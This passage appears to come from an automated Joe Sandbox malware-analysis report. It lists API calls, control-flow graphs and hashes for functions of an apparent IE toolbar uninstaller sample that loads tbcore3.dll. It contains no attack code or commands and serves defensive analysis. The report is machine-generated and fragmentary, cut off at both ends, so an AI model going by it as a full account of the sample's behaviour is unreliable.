4411->4415 4416 842391 4411->4416 4412->4411 4413 8435ee ___free_lconv_mon 66 API calls 4412->4413 4414 84246d __freefls@4 4412->4414 4413->4411 4415->4416 4417 8435ee ___free_lconv_mon 66 API calls 4416->4417 4418 84239f 4416->4418 4417->4418 4419 8423ad 4418->4419 4420 8435ee ___free_lconv_mon 66 API calls 4418->4420 4421 8423bb 4419->4421 4422 8435ee ___free_lconv_mon 66 API calls 4419->4422 4420->4419 4423 8423c9 4421->4423 4424 8435ee ___free_lconv_mon 66 API calls 4421->4424 4422->4421 4425 8423d7 4423->4425 4426 8435ee ___free_lconv_mon 66 API calls 4423->4426 4424->4423 4427 8423e8 4425->4427 4428 8435ee ___free_lconv_mon 66 API calls 4425->4428 4426->4425 4429 842aa0 __lock 66 API calls 4427->4429 4428->4427 4430 8423f0 4429->4430 4431 842415 4430->4431 4432 8423fc InterlockedDecrement 4430->4432 4446 842479 4431->4446 4432->4431 4433 842407 4432->4433 4433->4431 4436 8435ee ___free_lconv_mon 66 API calls 4433->4436 4436->4431 4437 842aa0 __lock 66 API calls 4438 842429 4437->4438 4439 84245a 4438->4439 4440 843d2d ___removelocaleref 8 API calls 4438->4440 4449 842485 4439->4449 4444 84243e 4440->4444 4443 8435ee ___free_lconv_mon 66 API calls 4443->4414 4444->4439 4445 843b55 ___freetlocinfo 66 API calls 4444->4445 4445->4439 4452 8429c6 LeaveCriticalSection 4446->4452 4448 842422 4448->4437 4453 8429c6 LeaveCriticalSection 4449->4453 4451 842467 4451->4443 4452->4448 4453->4451 4013 845138 4014 84514a 4013->4014 4016 845158 @_EH4_CallFilterFunc@8 4013->4016 4015 8410cc __except_handler4 5 API calls 4014->4015 4015->4016

                                                                                                                Executed Functions

                                                                                                                Function 00841000 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 73libraryloadersynchronizationCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00841006
                                                                                                                • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00841013
                                                                                                                • GetLastError.KERNEL32 ref: 0084101F
                                                                                                                • GetCommandLineW.KERNEL32(?), ref: 00841040
                                                                                                                • CommandLineToArgvW.SHELL32(00000000), ref: 00841047
                                                                                                                • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00841061
                                                                                                                • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00841073
                                                                                                                • LoadLibraryW.KERNELBASE(?), ref: 00841085
                                                                                                                • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00841097
                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 008410A4
                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 008410AB
                                                                                                                • CoUninitialize.COMBASE ref: 008410B1
                                                                                                                • LocalFree.KERNEL32(00000000), ref: 008410BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                                                                • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll$^Iu
                                                                                                                • API String ID: 474438367-586191020
                                                                                                                • Opcode ID: 823b47c8ba7deb10478af2dc27ecb4dd4bede7211f44b5b6d7adea90dc13d1fe
                                                                                                                • Instruction ID: 4a258ef55dc77f8b0c669675b56c6a5fecb26fedf7943603c76506f3c39fc933
                                                                                                                • Opcode Fuzzy Hash: 823b47c8ba7deb10478af2dc27ecb4dd4bede7211f44b5b6d7adea90dc13d1fe
                                                                                                                • Instruction Fuzzy Hash: D111B136605A6DEB8B30ABA0AC0CA9F3798FA577557000525F586D2150EF758885C7B2
                                                                                                                Function 00841465 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 16 841465-841476 call 84143a ExitProcess
                                                                                                                APIs
                                                                                                                • ___crtCorExitProcess.LIBCMT ref: 0084146D
                                                                                                                  • Part of subcall function 0084143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00841472,?,?,008454EE,000000FF,0000001E,?,008436FC,?,00000001,?,?,00842A2A,00000018), ref: 00841444
                                                                                                                  • Part of subcall function 0084143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00841454
                                                                                                                • ExitProcess.KERNEL32 ref: 00841476
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                • String ID:
                                                                                                                • API String ID: 2427264223-0
                                                                                                                • Opcode ID: 44bf871e21cb785f110293a716ce7449dc1d14f847af6a50dc66a0ba943e8247
                                                                                                                • Instruction ID: df7384bcfe3bdd05eb90f71801982994b7a7ff3e4f2d1ec97a778a6d4fbd19b9
                                                                                                                • Opcode Fuzzy Hash: 44bf871e21cb785f110293a716ce7449dc1d14f847af6a50dc66a0ba943e8247
                                                                                                                • Instruction Fuzzy Hash: 6AB0483100010CBB9B022F16DC0A84D7F2AFA813A0B608021F808890619E72A9929A95
                                                                                                                Function 0084261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 19 84261b-84263d HeapCreate 20 842641-84264a 19->20 21 84263f-842640 19->21
                                                                                                                APIs
                                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00842630
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 10892065-0
                                                                                                                • Opcode ID: bf4f2bb38f1eea3fadf16a23b68714d6cdf8fa2fa1cda5af80a74df4ba06a6fd
                                                                                                                • Instruction ID: 1f0990d0084b6a06ab4bd139daaa7508fb791e9c564e322250448004f573816f
                                                                                                                • Opcode Fuzzy Hash: bf4f2bb38f1eea3fadf16a23b68714d6cdf8fa2fa1cda5af80a74df4ba06a6fd
                                                                                                                • Instruction Fuzzy Hash: 19D05E3A5583489EDB105F716C087263BDCE385399F104475B90CC6150E674C590DE04
                                                                                                                Function 00841681 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 22 841681-84168d call 841555 24 841692-841696 22->24
                                                                                                                APIs
                                                                                                                • _doexit.LIBCMT ref: 0084168D
                                                                                                                  • Part of subcall function 00841555: __lock.LIBCMT ref: 00841563
                                                                                                                  • Part of subcall function 00841555: __decode_pointer.LIBCMT ref: 0084159A
                                                                                                                  • Part of subcall function 00841555: __decode_pointer.LIBCMT ref: 008415AF
                                                                                                                  • Part of subcall function 00841555: __decode_pointer.LIBCMT ref: 008415D9
                                                                                                                  • Part of subcall function 00841555: __decode_pointer.LIBCMT ref: 008415EF
                                                                                                                  • Part of subcall function 00841555: __decode_pointer.LIBCMT ref: 008415FC
                                                                                                                  • Part of subcall function 00841555: __initterm.LIBCMT ref: 0084162B
                                                                                                                  • Part of subcall function 00841555: __initterm.LIBCMT ref: 0084163B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 1597249276-0
                                                                                                                • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                • Instruction ID: 9caf5a6bc66e1b0b89e83e64f1b3a14811d6fe7ff057d264f2b0ad51cdf14e58
                                                                                                                • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                • Instruction Fuzzy Hash: 98B0923258020C33DB20258AAC07F467A0997C0BA0F260020FA0C191E1A9A2A9A1808A

                                                                                                                Non-executed Functions

                                                                                                                Function 008410CC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00841346
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0084135B
                                                                                                                • UnhandledExceptionFilter.KERNEL32(0084816C), ref: 00841366
                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00841382
                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00841389
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2579439406-0
                                                                                                                • Opcode ID: c82d63d8217bd2ca36315ce41c185385c313fbfbd664b130d71ea43aea8b118b
                                                                                                                • Instruction ID: 2acb48f06fafb4ed6c737ac684314037f5fd152fd073707a2b7dc49825feb186
                                                                                                                • Opcode Fuzzy Hash: c82d63d8217bd2ca36315ce41c185385c313fbfbd664b130d71ea43aea8b118b
                                                                                                                • Instruction Fuzzy Hash: 2E21F2BC891704DFE758DF69FD847087BB4FB0A302F40402AE5088BA61EB795884CF46
                                                                                                                Function 008421E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00849458,0000000C,00842320,00000000,00000000,?,0084174F,00000003,?,?,?,?,?,?,008410F6), ref: 008421F7
                                                                                                                • __crt_waiting_on_module_handle.LIBCMT ref: 00842202
                                                                                                                  • Part of subcall function 008413E1: Sleep.KERNEL32(000003E8,00000000,?,00842148,KERNEL32.DLL,?,00842194,?,0084174F,00000003), ref: 008413ED
                                                                                                                  • Part of subcall function 008413E1: GetModuleHandleW.KERNEL32(?,?,00842148,KERNEL32.DLL,?,00842194,?,0084174F,00000003,?,?,?,?,?,?,008410F6), ref: 008413F6
                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0084222B
                                                                                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0084223B
                                                                                                                • __lock.LIBCMT ref: 0084225D
                                                                                                                • InterlockedIncrement.KERNEL32(0084A4D8), ref: 0084226A
                                                                                                                • __lock.LIBCMT ref: 0084227E
                                                                                                                • ___addlocaleref.LIBCMT ref: 0084229C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 1028249917-2843748187
                                                                                                                • Opcode ID: 023ac31e1b4a7894c2dc6a7e3a1bc3188c5aff9d6b59cc9f580d5f558916d504
                                                                                                                • Instruction ID: a604ce6645a8269d0ccdb8983bf53bec6dbf100dd2af82128834c5736a1dc75e
                                                                                                                • Opcode Fuzzy Hash: 023ac31e1b4a7894c2dc6a7e3a1bc3188c5aff9d6b59cc9f580d5f558916d504
                                                                                                                • Instruction Fuzzy Hash: 14118C70944B09DED720AF69D845B5EFBE0FF14320F604559F4A9E72A0CBB49A44CB26
                                                                                                                Function 008440A0 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 170 8440a0-8440bb call 84264c call 842345 175 8440bd-8440c1 170->175 176 8440da-8440f2 call 842aa0 170->176 175->176 178 8440c3 175->178 183 8440f4-8440f6 176->183 184 84412a-844136 call 84413b 176->184 179 8440c6-8440c8 178->179 181 8440d2-8440d9 call 842691 179->181 182 8440ca-8440d1 call 841411 179->182 182->181 188 844112-844124 InterlockedIncrement 183->188 189 8440f8-844101 InterlockedDecrement 183->189 184->179 188->184 189->188 193 844103-844109 189->193 193->188 194 84410b-844111 call 8435ee 193->194 194->188
                                                                                                                APIs
                                                                                                                • __getptd.LIBCMT ref: 008440AC
                                                                                                                  • Part of subcall function 00842345: __getptd_noexit.LIBCMT ref: 00842348
                                                                                                                  • Part of subcall function 00842345: __amsg_exit.LIBCMT ref: 00842355
                                                                                                                • __amsg_exit.LIBCMT ref: 008440CC
                                                                                                                • __lock.LIBCMT ref: 008440DC
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 008440F9
                                                                                                                • InterlockedIncrement.KERNEL32(02D52B08), ref: 00844124
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 4271482742-0
                                                                                                                • Opcode ID: f829a629c4c0604149a3af3fa1c6c1b096d63e2e388b8862288e588ce61d0e30
                                                                                                                • Instruction ID: f3ebe6b74256be28d510892e4bcd99904f51260ccb6fcc5157e624d49f7b77bd
                                                                                                                • Opcode Fuzzy Hash: f829a629c4c0604149a3af3fa1c6c1b096d63e2e388b8862288e588ce61d0e30
                                                                                                                • Instruction Fuzzy Hash: 52012E32901A2DEBDB25AF28880A34DBB60FF04720F014005F900EB291DB34AD91CFD6
                                                                                                                Function 008435EE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 197 8435ee-8435ff call 84264c 200 843676-84367b call 842691 197->200 201 843601-843608 197->201 202 84364d 201->202 203 84360a-843622 call 842aa0 call 8445e4 201->203 205 84364e-84365e HeapFree 202->205 215 843624-84362c call 844614 203->215 216 84362d-84363d call 843644 203->216 205->200 208 843660-843675 call 842c72 GetLastError call 842c30 205->208 208->200 215->216 216->200 222 84363f-843642 216->222 222->205
                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 0084360C
                                                                                                                  • Part of subcall function 00842AA0: __mtinitlocknum.LIBCMT ref: 00842AB6
                                                                                                                  • Part of subcall function 00842AA0: __amsg_exit.LIBCMT ref: 00842AC2
                                                                                                                  • Part of subcall function 00842AA0: EnterCriticalSection.KERNEL32(?,?,?,00845600,00000004,00849628,0000000C,00843746,?,?,00000000,00000000,00000000,?,008422F7,00000001), ref: 00842ACA
                                                                                                                • ___sbh_find_block.LIBCMT ref: 00843617
                                                                                                                • ___sbh_free_block.LIBCMT ref: 00843626
                                                                                                                • HeapFree.KERNEL32(00000000,?,00849568,0000000C,00842A81,00000000,008494C8,0000000C,00842ABB,?,?,?,00845600,00000004,00849628,0000000C), ref: 00843656
                                                                                                                • GetLastError.KERNEL32(?,00845600,00000004,00849628,0000000C,00843746,?,?,00000000,00000000,00000000,?,008422F7,00000001,00000214), ref: 00843667
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714421763-0
                                                                                                                • Opcode ID: 9ae9b57d069d25ef7432f9e4ddd612503a3c22eebdd6bdc64078f05f396d3dbc
                                                                                                                • Instruction ID: 8257838c1c94194b54fdf8ef07782e5c9099e48c90784920703022d3b499aeaf
                                                                                                                • Opcode Fuzzy Hash: 9ae9b57d069d25ef7432f9e4ddd612503a3c22eebdd6bdc64078f05f396d3dbc
                                                                                                                • Instruction Fuzzy Hash: E8016275D0830EBAEB207B759C06B5E3664FF31764FA24149F444E62D1DF388A40EA5A
                                                                                                                Function 00843E04 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 223 843e04-843e1f call 84264c call 842345 228 843e21-843e25 223->228 229 843e43-843e6c call 842aa0 call 843dc6 call 843e6e 223->229 228->229 231 843e27-843e2c call 842345 228->231 237 843e2f-843e31 229->237 231->237 239 843e33-843e3a call 841411 237->239 240 843e3b-843e42 call 842691 237->240 239->240
                                                                                                                APIs
                                                                                                                • __getptd.LIBCMT ref: 00843E10
                                                                                                                  • Part of subcall function 00842345: __getptd_noexit.LIBCMT ref: 00842348
                                                                                                                  • Part of subcall function 00842345: __amsg_exit.LIBCMT ref: 00842355
                                                                                                                • __getptd.LIBCMT ref: 00843E27
                                                                                                                • __amsg_exit.LIBCMT ref: 00843E35
                                                                                                                • __lock.LIBCMT ref: 00843E45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3521780317-0
                                                                                                                • Opcode ID: 972223243c4e8ae913798cc5d5b8fbbc74bd2e8f209c2285aefe4449fed4a516
                                                                                                                • Instruction ID: 543f463712e6d3e349933615af7d5a6060233e78e9f00a52e77bff8bfe9d3bab
                                                                                                                • Opcode Fuzzy Hash: 972223243c4e8ae913798cc5d5b8fbbc74bd2e8f209c2285aefe4449fed4a516
                                                                                                                • Instruction Fuzzy Hash: 2DF0673294931C8BE720EB78880A74D72A0FF54B60F914189F451EBAA2CB749A41CB57

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:0.5%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:4.2%
                                                                                                                Total number of Nodes:214
                                                                                                                Total number of Limit Nodes:5
                                                                                                                execution_graph 19357 423332 19358 42333f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 19357->19358 19360 423385 __fassign 19358->19360 19365 426a97 19358->19365 19361 4233b4 19360->19361 19370 426a72 19360->19370 19373 423615 19361->19373 19364 4233bc 19366 426aad 19365->19366 19368 427142 ___scrt_is_nonwritable_in_current_image 19365->19368 19366->19360 19377 42737b 19368->19377 19371 42695b __fassign 2 API calls 19370->19371 19372 426a7d 19371->19372 19372->19361 19374 423621 19373->19374 19376 42362f ___scrt_uninitialize_crt 19374->19376 19403 4270b3 19374->19403 19376->19364 19378 427380 __fassign 19377->19378 19382 42738b __fassign 19378->19382 19383 42b6e3 19378->19383 19388 426a81 19382->19388 19384 42b6ef ___scrt_is_nonwritable_in_current_image ___scrt_uninitialize_crt __fassign 19383->19384 19385 426a81 __fassign 2 API calls 19384->19385 19387 42b74d __dosmaperr __fassign 19384->19387 19386 42b8d5 19385->19386 19387->19382 19391 42695b 19388->19391 19392 426969 __fassign 19391->19392 19393 4269b4 19392->19393 19396 4269bf 19392->19396 19395 4269be 19401 42a98f GetPEB 19396->19401 19398 4269c9 19399 4269ce GetPEB 19398->19399 19400 4269de __fassign 19398->19400 19399->19400 19400->19395 19402 42a9a9 __fassign 19401->19402 19402->19398 19404 4270d0 ___scrt_uninitialize_crt 19403->19404 19405 4270be 19403->19405 19404->19376 19406 4270cc 19405->19406 19408 42bb60 19405->19408 19406->19376 19411 42ba0e 19408->19411 19414 42b962 19411->19414 19413 42ba4d 19413->19406 19416 42b96e ___scrt_is_nonwritable_in_current_image ___scrt_uninitialize_crt 19414->19416 19415 42b9e4 ___scrt_uninitialize_crt 19415->19413 19416->19415 19418 42b8d6 19416->19418 19419 42b8e2 ___scrt_is_nonwritable_in_current_image ___scrt_uninitialize_crt 19418->19419 19420 42b938 ___scrt_uninitialize_crt 19419->19420 19422 42bb18 19419->19422 19420->19416 19423 42bb25 19422->19423 19424 42bb2e 19422->19424 19426 42ba0e ___scrt_uninitialize_crt 2 API calls 19423->19426 19428 42bab3 19424->19428 19427 42bb2b ___scrt_uninitialize_crt 19426->19427 19427->19420 19429 42baf0 19428->19429 19430 42bacb ___scrt_uninitialize_crt 19428->19430 19429->19427 19430->19429 19432 42f227 19430->19432 19433 42f233 ___scrt_is_nonwritable_in_current_image ___scrt_uninitialize_crt 19432->19433 19435 42f23b ___scrt_uninitialize_crt __dosmaperr __fassign 19433->19435 19436 42f319 19433->19436 19435->19429 19437 42f33b 19436->19437 19438 42f33f ___scrt_uninitialize_crt __dosmaperr __fassign 19436->19438 19437->19438 19439 43013f ___scrt_uninitialize_crt GetPEB GetPEB 19437->19439 19440 42f3a5 ___scrt_uninitialize_crt 19437->19440 19438->19435 19439->19440 19440->19438 19441 42eaac ___scrt_uninitialize_crt GetPEB GetPEB 19440->19441 19441->19438 19442 422040 19443 4220f3 19442->19443 19444 4222f7 RtlAdjustPrivilege 19443->19444 19446 422303 19444->19446 19446->19446 19447 421c40 19446->19447 19449 421c53 19447->19449 19450 421c75 19449->19450 19451 4271fa 19449->19451 19450->19446 19452 427208 19451->19452 19454 42720e __dosmaperr __fassign 19452->19454 19456 427243 19452->19456 19454->19449 19455 42723e 19455->19449 19457 42726d 19456->19457 19460 427253 __dosmaperr __fassign 19456->19460 19457->19460 19462 425108 19457->19462 19459 4271bb GetPEB GetPEB 19461 427297 19459->19461 19460->19455 19461->19459 19461->19460 19463 42511f 19462->19463 19464 425128 19462->19464 19463->19461 19464->19463 19468 4285b4 19464->19468 19469 4285c7 19468->19469 19470 42515e 19468->19470 19469->19470 19476 42b346 19469->19476 19472 4285e1 19470->19472 19473 428609 19472->19473 19474 4285f4 19472->19474 19473->19463 19474->19473 19481 42a495 19474->19481 19478 42b352 ___scrt_is_nonwritable_in_current_image ___scrt_uninitialize_crt __fassign 19476->19478 19477 42b3a1 19477->19470 19478->19477 19479 42737b __fassign 2 API calls 19478->19479 19480 42b3c6 19479->19480 19482 42a49f 19481->19482 19485 42a3ad 19482->19485 19489 42a3b9 ___scrt_is_nonwritable_in_current_image ___scrt_uninitialize_crt __freea __fassign 19485->19489 19486 42a3da 19486->19473 19487 42737b __fassign 2 API calls 19488 42a44c 19487->19488 19489->19486 19489->19487 19490 421030 19491 42115f 19490->19491 19493 42106c 19490->19493 19492 421c40 2 API calls 19494 421158 19492->19494 19493->19492 19494->19491 19497 421000 19494->19497 19496 421888 19498 421019 19497->19498 19501 426004 19498->19501 19504 424dfe 19501->19504 19503 421023 19503->19496 19505 424e09 __dosmaperr __fassign 19504->19505 19506 424e1e 19504->19506 19505->19503 19507 424e44 __dosmaperr __fassign 19506->19507 19509 424c80 19506->19509 19507->19503 19510 424cc0 19509->19510 19511 424ca8 __dosmaperr __fassign _ValidateLocalCookies 19509->19511 19510->19511 19512 425108 __fassign 2 API calls 19510->19512 19511->19507 19513 424cd8 19512->19513 19515 425369 19513->19515 19517 42537a 19515->19517 19516 425389 __dosmaperr __fassign 19516->19511 19517->19516 19522 42591d 19517->19522 19527 425577 19517->19527 19532 42559d 19517->19532 19542 4256eb 19517->19542 19523 425926 19522->19523 19524 